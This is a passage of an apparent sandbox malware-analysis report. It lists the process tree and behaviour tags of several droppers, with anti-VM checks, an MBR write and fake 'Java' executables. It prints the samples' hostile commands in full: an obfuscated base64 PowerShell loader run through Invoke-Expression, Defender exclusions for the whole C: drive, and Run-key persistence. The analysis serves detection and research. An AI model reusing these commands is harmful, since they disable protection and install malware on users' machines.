        "C:\Users\Admin\AppData\Local\Temp\10370260101\194b034ebb.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370260101\194b034ebb.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2320
      - C:\Users\Admin\AppData\Local\Temp\10370270101\2609233090.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370270101\2609233090.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370270101\2609233090.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4964
      - C:\Users\Admin\AppData\Local\Temp\10370280101\6lV7WRt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370280101\6lV7WRt.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:876
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3108
      - C:\Users\Admin\AppData\Local\Temp\10370290101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370290101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3504
      - C:\Users\Admin\AppData\Local\Temp\10370300101\6a8d5b79b0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370300101\6a8d5b79b0.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1988
      - C:\Users\Admin\AppData\Local\Temp\10370310101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370310101\TbV75ZR.exe"
        6⤵
        
        PID:1520
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:2472
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 500
        8⤵
        Program crash
        
        PID:5336
      - C:\Users\Admin\AppData\Local\Temp\10370320101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370320101\EPTwCQd.exe"
        6⤵
        
        PID:6036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4960
      - C:\Users\Admin\AppData\Local\Temp\10370330101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370330101\7IIl2eE.exe"
        6⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        
        PID:4764
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10370341121\8BNn7ce.cmd"
        6⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10370341121\8BNn7ce.cmd"
        7⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7352
      - C:\Users\Admin\AppData\Local\Temp\10370350101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370350101\u75a1_003.exe"
        6⤵
        
        PID:6192
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:6356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7164
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:6408
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:7044
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:7552
      - C:\Users\Admin\AppData\Local\Temp\10370360101\fabfe06880.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370360101\fabfe06880.exe"
        6⤵
        
        PID:8092
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:25564
      - C:\Users\Admin\AppData\Local\Temp\10370380101\8LfjZ9b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370380101\8LfjZ9b.exe"
        6⤵
        
        PID:8224
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:18084

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1228

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:5888

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5780

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe"
1⤵
PID:3884
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
  2⤵
  PID:3972
- - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
    3⤵
    PID:1504
  - - C:\Windows\system32\reg.exe
      reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport_platform.exe"
      4⤵
      Modifies registry key
      PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe\"'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      PID:2500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe"
1⤵
PID:1672
- C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
  2⤵
  PID:3212
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
    3⤵
    PID:4464
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
      4⤵
      PID:2152
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        5⤵
        
        PID:3184
      - C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"
        6⤵
        Modifies registry key
        
        PID:4876
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:4564
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"
1⤵
PID:5252
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
  2⤵
  PID:5608
- - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
    3⤵
    PID:1848
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
      4⤵
      PID:1980
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        5⤵
        
        PID:3928
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        6⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        7⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        8⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        9⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        10⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        11⤵
        
        PID:4572
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        12⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        13⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        14⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        15⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        16⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        17⤵
        
        PID:3848
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_update.exe"
        18⤵
        Modifies registry key
        
        PID:4216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe\"'"
        18⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe"
1⤵
PID:4500
- C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  2⤵
  PID:3908
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
    3⤵
    PID:5184
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
      4⤵
      PID:2264
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        5⤵
        
        PID:2324
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        6⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        7⤵
        
        PID:4468
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        8⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        9⤵
        
        PID:4112
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        10⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        11⤵
        
        PID:4712
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        12⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        13⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        14⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        15⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        16⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        17⤵
        
        PID:3228
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime_service.exe"
        18⤵
        Modifies registry key
        
        PID:220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe\"'"
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
